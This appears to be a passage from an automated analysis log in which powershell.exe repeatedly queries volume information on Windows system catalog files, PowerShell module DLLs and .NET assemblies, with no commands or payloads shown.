Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
